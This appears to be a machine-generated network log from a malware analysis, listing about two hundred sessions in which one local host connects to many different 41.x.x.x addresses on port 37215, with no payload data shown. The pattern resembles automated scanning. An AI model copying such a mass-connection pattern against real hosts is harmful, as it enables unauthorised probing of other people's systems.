                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18145192.168.2.153737841.8.222.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18146192.168.2.154532441.136.76.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18147192.168.2.156005441.116.9.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18148192.168.2.155132841.121.174.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18149192.168.2.154931441.60.197.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18150192.168.2.154546041.251.107.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18151192.168.2.154252641.180.131.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18152192.168.2.154745241.81.31.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18153192.168.2.154074441.125.18.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18154192.168.2.156004241.109.148.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18155192.168.2.155521841.46.1.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18156192.168.2.153337241.248.172.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18157192.168.2.153367641.199.188.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18158192.168.2.154214241.153.9.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18159192.168.2.155288441.146.141.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18160192.168.2.155157841.220.69.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18161192.168.2.153337641.135.188.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18162192.168.2.153285641.52.207.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18163192.168.2.153944841.213.165.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18164192.168.2.155495641.196.79.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18165192.168.2.154485641.220.55.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18166192.168.2.154163641.139.86.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18167192.168.2.154720041.235.248.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18168192.168.2.154092041.100.40.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18169192.168.2.154944241.239.250.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18170192.168.2.154598041.22.41.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18171192.168.2.156055641.221.148.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18172192.168.2.153740241.1.170.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18173192.168.2.155242441.248.187.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18174192.168.2.156056241.31.29.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18175192.168.2.154999041.63.122.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18176192.168.2.156072441.5.110.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18177192.168.2.156042041.74.135.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18178192.168.2.156025841.83.14.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18179192.168.2.154096041.47.129.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18180192.168.2.156095641.210.208.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18181192.168.2.153922441.241.218.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18182192.168.2.153507641.215.209.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18183192.168.2.154117441.173.94.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18184192.168.2.153698441.241.57.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18185192.168.2.153329441.69.81.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18186192.168.2.155068841.23.106.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18187192.168.2.155926241.228.31.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18188192.168.2.155782241.130.242.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18189192.168.2.155068441.212.136.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18190192.168.2.154449041.159.10.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18191192.168.2.154852641.171.229.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18192192.168.2.155000641.28.234.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18193192.168.2.154863041.67.204.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18194192.168.2.155518441.246.247.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18195192.168.2.154763041.133.156.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18196192.168.2.154803441.81.28.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18197192.168.2.154786841.3.217.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18198192.168.2.154338441.35.12.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18199192.168.2.154008241.48.10.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18200192.168.2.155087241.243.207.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18201192.168.2.155154241.117.79.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18202192.168.2.154638441.150.147.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18203192.168.2.154029841.0.61.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18204192.168.2.154808041.15.76.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18205192.168.2.153291241.3.43.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18206192.168.2.155361241.232.94.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18207192.168.2.155366641.38.85.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18208192.168.2.154897841.88.187.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18209192.168.2.154314041.107.80.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18210192.168.2.155907041.153.93.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18211192.168.2.155113241.122.170.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18212192.168.2.153502841.43.230.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18213192.168.2.155249441.170.19.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18214192.168.2.154398241.241.81.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18215192.168.2.155351441.120.22.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18216192.168.2.154800841.156.229.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18217192.168.2.154667041.76.135.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18218192.168.2.154056441.46.143.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18219192.168.2.155248241.114.63.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18220192.168.2.155249441.79.118.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18221192.168.2.155588441.237.75.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18222192.168.2.154930241.14.217.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18223192.168.2.154562441.219.148.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18224192.168.2.153885041.191.116.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18225192.168.2.154578641.216.150.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18226192.168.2.155899441.29.64.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18227192.168.2.155041441.255.217.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18228192.168.2.153591841.88.165.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18229192.168.2.155086041.223.103.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18230192.168.2.155602441.75.97.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18231192.168.2.153702841.79.216.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18232192.168.2.155787241.97.138.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18233192.168.2.155025441.152.139.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18234192.168.2.154559241.152.250.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18235192.168.2.153606041.21.214.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18236192.168.2.155809441.153.210.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18237192.168.2.154067841.111.190.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18238192.168.2.153314841.100.136.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18239192.168.2.155331441.31.15.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18240192.168.2.155954441.69.114.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18241192.168.2.154777441.75.60.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18242192.168.2.155572041.178.169.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18243192.168.2.155359041.23.131.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18244192.168.2.154934041.158.98.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18245192.168.2.154317841.212.237.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18246192.168.2.155792241.2.149.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18247192.168.2.155248841.111.159.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18248192.168.2.153398241.20.74.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18249192.168.2.156024441.138.179.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18250192.168.2.155169241.82.228.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18251192.168.2.155966841.70.38.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18252192.168.2.154890241.118.178.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18253192.168.2.154262241.148.249.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18254192.168.2.155804441.113.137.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18255192.168.2.153525841.5.158.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18256192.168.2.153614641.85.53.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18257192.168.2.154895641.202.175.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18258192.168.2.155116641.204.91.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18259192.168.2.153651241.234.205.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18260192.168.2.154233041.125.75.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18261192.168.2.153947841.165.48.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18262192.168.2.154175041.47.2.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18263192.168.2.155567441.124.215.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18264192.168.2.154921641.121.192.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18265192.168.2.153416441.88.18.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18266192.168.2.153837441.69.224.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18267192.168.2.156003441.215.123.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18268192.168.2.153641441.231.152.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18269192.168.2.155842641.41.208.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18270192.168.2.154367841.140.168.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18271192.168.2.153717041.109.88.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18272192.168.2.156062641.20.100.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18273192.168.2.153513641.195.31.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18274192.168.2.154841041.140.127.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18275192.168.2.154786241.106.46.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18276192.168.2.154800241.32.74.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18277192.168.2.153342841.12.97.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18278192.168.2.155786841.110.23.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18279192.168.2.155826841.236.115.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18280192.168.2.153885441.143.242.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18281192.168.2.155465041.0.19.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18282192.168.2.154905441.158.193.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18283192.168.2.153710641.190.82.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18284192.168.2.154090241.47.73.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18285192.168.2.153784041.37.82.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18286192.168.2.155942241.155.133.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18287192.168.2.155841841.127.242.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18288192.168.2.154511441.58.72.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18289192.168.2.155873641.179.5.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18290192.168.2.153439441.194.196.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18291192.168.2.154173641.201.111.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18292192.168.2.154720641.133.166.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18293192.168.2.154607441.91.75.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18294192.168.2.155206241.1.121.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18295192.168.2.153831841.24.207.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18296192.168.2.155415841.100.124.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18297192.168.2.153487841.38.143.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18298192.168.2.155982641.244.1.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18299192.168.2.154500041.123.112.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18300192.168.2.153363041.161.80.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18301192.168.2.155909041.102.231.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18302192.168.2.155879241.172.59.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18303192.168.2.154993041.2.225.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18304192.168.2.155551841.184.70.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18305192.168.2.154019241.173.255.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18306192.168.2.154180241.213.108.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18307192.168.2.154559441.156.71.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18308192.168.2.153997441.223.62.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18309192.168.2.153987641.37.151.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18310192.168.2.153382241.146.192.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18311192.168.2.153861441.81.38.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18312192.168.2.153461441.156.195.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18313192.168.2.155298641.37.106.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18314192.168.2.154255841.144.185.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18315192.168.2.154048441.124.69.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18316192.168.2.154113241.93.61.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18317192.168.2.153659041.175.164.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18318192.168.2.154718441.75.113.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18319192.168.2.154374241.163.77.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18320192.168.2.154416841.243.207.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18321192.168.2.154167241.178.206.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18322192.168.2.155190041.230.244.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18323192.168.2.154367641.105.131.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18324192.168.2.154834441.100.223.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18325192.168.2.153595841.44.6.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18326192.168.2.155711841.201.55.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18327192.168.2.155680241.85.71.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18328192.168.2.155227841.163.162.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18329192.168.2.153417441.175.81.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18330192.168.2.155771241.138.125.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18331192.168.2.153694441.244.156.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18332192.168.2.154900041.12.195.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18333192.168.2.154246841.76.215.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18334192.168.2.153411241.23.46.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18335192.168.2.154794241.24.174.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18336192.168.2.153431441.239.255.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18337192.168.2.154651241.23.191.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18338192.168.2.154807041.133.57.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18339192.168.2.154488441.131.18.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18340192.168.2.155230241.202.17.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18341192.168.2.154448241.21.171.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18342192.168.2.153377241.226.237.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18343192.168.2.154567441.124.162.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18344192.168.2.154381041.138.226.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18345192.168.2.154246441.165.106.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18346192.168.2.155238641.132.20.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18347192.168.2.154840241.201.248.12937215
